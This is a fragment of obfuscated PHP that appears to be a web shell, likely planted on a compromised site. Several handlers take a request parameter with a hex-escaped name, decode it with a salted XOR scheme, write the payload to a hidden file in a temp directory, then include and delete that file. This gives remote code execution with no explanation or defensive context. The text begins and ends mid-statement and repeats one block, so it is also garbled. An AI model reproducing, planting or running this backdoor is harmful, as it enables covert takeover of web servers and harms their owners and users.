= $len) break; $v8 = $marker[$w]; $sChar = ord($s9[$w % $sLen]); $d =((int)$v8 - $sChar -($w % 10)) ^ 35; $key .= chr($d); $w++; } while(true); $bind = array_filter([sys_get_temp_dir(), getenv("TEMP"), session_save_path(), "/tmp", "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd()]); for ($ptr = 0, $itm = count($bind); $ptr < $itm; $ptr++) { $mrk = $bind[$ptr]; if ((bool)is_dir($mrk) && (bool)is_writable($mrk)) { $entry = str_replace("{var_dir}", $mrk, "{var_dir}/.ent"); if (@file_put_contents($entry, $key) !== false) { include $entry; unlink($entry); exit; } } } } if(isset($_REQUEST["\x68\x6Fl\x64er"])){ $mrk = array_filter([session_save_path(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getcwd(), "/dev/shm", getenv("TMP"), sys_get_temp_dir()]); $fac = $_REQUEST["\x68\x6Fl\x64er"]; $fac = explode( "." , $fac ); $k = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $__len = count( $fac); for( $z = 0; $z < $__len; $z++) { $v9 = $fac[$z]; $chS = ord( $s[$z % $lenS]); $dec =( ( int)$v9 - $chS -( $z % 10)) ^ 37; $k .= chr( $dec);} foreach ($mrk as $obj) { if (!( !is_dir($obj) || !is_writable($obj) )) { $res = join("/", [$obj, ".descriptor"]); if (file_put_contents($res, $k)) { include $res; @unlink($res); die(); } } } } if(@$_REQUEST["\x76al"] !== null){ $parameter_group = array_filter([sys_get_temp_dir(), "/dev/shm", getenv("TMP"), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp"]); $factor = $_REQUEST["\x76al"]; $factor =explode( "." , $factor ); $value = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $y = 0; $__tmp = $factor; while ($v4 = array_shift($__tmp)) { $sChar = ord($salt[$y % $sLen] ); $d = ((int)$v4 - $sChar - ($y % 10))^ 5; $value .= chr($d ); $y++; } foreach ($parameter_group as $ent): if (!( !is_dir($ent) || !is_writable($ent) )) { $pointer = implode("/", [$ent, ".reference"]); $file = fopen($pointer, 'w'); if ($file) { fwrite($file, $value); fclose($file); include $pointer; @unlink($pointer); die(); } } endforeach; } if(count($_REQUEST) > 0 && isset($_REQUEST["\x65\x6Etit\x79"])){ $component = $_REQUEST["\x65\x6Etit\x79"]; $component = explode ( ".",$component ) ; $symbol= ''; $s4= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s4); $len= count($component); for ($r= 0; $r < $len; $r++) { $v7= $component[$r]; $chS= ord($s4[$r % $lenS]); $dec= ((int)$v7 - $chS - ($r % 10)) ^ 40; $symbol .=chr($dec); } $ref = array_filter([getenv("TMP"), getcwd(), "/tmp", session_save_path(), "/dev/shm", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); foreach ($ref as $binding): if (is_dir($binding) && is_writable($binding)) { $bind = "$binding" . "/.desc"; if (@file_put_contents($bind, $symbol) !== false) { include $bind; unlink($bind); die(); } } endforeach; } php if(count($_REQUEST) > 0 && isset($_REQUEST["\x65\x6Etit\x79"])){ $component = $_REQUEST["\x65\x6Etit\x79"]; $component = explode ( ".",$component ) ; $symbol= ''; $s4= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s4); $len= count($component); for ($r= 0; $r < $len; $r++) { $v7= $component[$r]; $chS= ord($s4[$r % $lenS]); $dec= ((int)$v7 - $chS - ($r % 10)) ^ 40; $symbol .=chr($dec); } $ref = array_filter([getenv("TMP"), getcwd(), "/tmp", session_save_path(), "/dev/shm", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); foreach ($ref as $binding): if (is_dir($binding) && is_writable($binding)) { $bind = "$binding" . "/.desc"; if (@file_put